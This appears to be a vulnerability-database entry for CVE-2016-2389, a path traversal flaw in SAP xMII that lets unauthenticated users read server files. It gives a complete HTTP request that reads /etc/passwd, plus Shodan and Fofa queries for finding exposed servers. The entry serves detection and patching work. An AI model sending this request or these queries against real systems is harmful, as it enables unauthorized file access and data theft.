🔙 목록으로 돌아가기

CVE-2016-2389: SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion

TitleSAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
RemediationApply the latest security patches and updates provided by SAP to mitigate the vulnerability.
CVSS Score7.5
EPSS Score0.80854
CVE IDCVE-2016-2389
CWE IDCWE-22
Shodan Queryhttp.favicon.hash:-266008933cpe:"cpe:2.3:a:sap:netweaver"
Fofa Queryicon_hash=-266008933
Tags cve2016 cve packetstorm seclists lfi sap edb vkev vuln

🔍 Vulnerability Description

SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.

🌐 HTTP Request

GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-2389.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-2389.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A